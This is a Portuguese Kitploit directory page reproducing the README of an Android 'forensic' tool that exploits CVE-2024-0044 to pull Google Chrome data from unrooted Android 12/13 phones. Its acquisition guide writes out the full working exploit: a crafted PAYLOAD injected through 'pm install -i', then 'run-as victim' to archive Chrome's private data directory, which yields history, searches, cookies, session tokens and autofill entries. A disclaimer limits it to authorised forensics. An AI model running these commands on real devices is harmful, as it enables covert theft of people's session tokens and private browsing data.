Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Chrome-Forensic_CVE-2024-0044 — Uma ferramenta robusta de forense digital para extrair e analisar artefatos do Google Chrome em dispositivos Android. | Kitploit
Ferramentas/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Segurança AndroidAnálise de VulnerabilidadesExploraçãoAnálise ForenseForensia MóvelRecuperação de DadosForensia DigitalSegurança MóvelAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Uma ferramenta robusta de forense digital para extrair e analisar artefatos do Google Chrome em dispositivos Android.

Ver Repositório
1há 7 mesesAinda não revisado

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Uma ferramenta robusta de forense digital para extrair e analisar artefatos do Google Chrome em dispositivos Android

Recursos • Instalação • Uso • Documentação


👤 Informações do Autor

Autor: JackTekno
GitHub: github.com/JackTekno


📋 Visão Geral

Esta ferramenta utiliza a vulnerabilidade CVE-2024-0044 (Run-as) para contornar restrições de permissão em dispositivos Android 12/13 sem root, permitindo a extração forense de dados do Google Chrome. A ferramenta analisa bancos de dados SQLite brutos e gera relatórios de análise abrangentes.

🔄 Fluxo do Processo

Fluxograma de Análise Forense

Fluxo de trabalho completo da análise forense, da aquisição ao relatório


📊 Recursos e Saída

A ferramenta gera um relatório Excel abrangente (result_chrome_forensic.xlsx) com as seguintes planilhas:


🛠️ Pré-requisitos

Requisitos de Hardware

  • 📱 Telefone Android (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

Ambiente Testado

  • 🐧 OS: Linux UOS 20 Professional

Requisitos de Software

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Arquivo APK dummy (ex.: F-Droid.apk)

🚀 Instalação

  1. Clone o repositório

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Instale as dependências

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Guia de Aquisição de Dados

Passo 1: Prepare o Dispositivo

  1. Vá para Configurações → Sobre o telefone
  2. Toque em Número da versão 7 vezes para ativar as Opções do desenvolvedor
  3. Vá para Configurações → Sistema → Opções do desenvolvedor
  4. Ative a Depuração USB
  5. Conecte o telefone ao PC via USB e autorize a conexão

Passo 2: Prepare o Exploit

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

Passo 3: Encontre o UID de Destino

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

Passo 4: Execute o Exploit

⚠️ Substitua 10129 pelo UID real do Chrome do Passo 3

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Passo 5: Extraia os Dados

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

Passo 6: Transfira os Dados para o PC

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Passo 7: Descompacte os Dados

Extraia o arquivo 'chrome.tar' na pasta do projeto. Você não precisa mover os arquivos manualmente. O script Python encontrará automaticamente os arquivos de banco de dados dentro das pastas extraídas.

root@kitploit:~
tar -xf chrome.tar

💻 Uso

Execute a ferramenta de análise forense:

root@kitploit:~
python3 chrome_forensic.py

A ferramenta analisará os arquivos de banco de dados e gerará result_chrome_forensic.xlsx no mesmo diretório.


⚖️ Aviso Legal

⚠️ IMPORTANTE: Esta ferramenta foi projetada apenas para fins educacionais e de análise forense autorizada.

  • Use apenas em dispositivos que você possui ou para os quais tenha permissão explícita por escrito para analisar
  • O acesso não autorizado a dispositivos digitais pode violar as leis da sua jurisdição
  • Os autores não assumem responsabilidade pelo uso indevido desta ferramenta

🤝 Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.


📄 Licença

Este projeto está licenciado sob a GNU General Public License v3.0. Consulte o arquivo LICENSE para obter detalhes.


👤 Créditos

A prova de conceito do método de aquisição foi resumida e compartilhada por Tinyhack.com.


Feito com ❤️ por JackTekno

⭐ Dê uma estrela neste repositório • 🐛 Reportar Bug • 💡 Solicitar Recurso

Baixar ferramenta
Nome da PlanilhaDescrição
📖 Histórico de NavegaçãoLinha do tempo detalhada de URLs visitadas
📈 Análises – Principais SitesRanking estatístico dos domínios mais visitados
⚠️ ALERTAS – SuspeitosURLs sinalizadas automaticamente (hacking, drogas, conteúdo adulto)
📥 DownloadsHistórico de downloads com caminhos e tamanhos de arquivos
🔍 Termos de PesquisaConsultas de pesquisa do usuário na omnibox/Google
🍪 Cookies e SessõesTokens de sessão e metadados de cookies (criptografados em Hex)
✍️ Dados de Preenchimento AutomáticoDados de formulários salvos (nomes, endereços, etc.)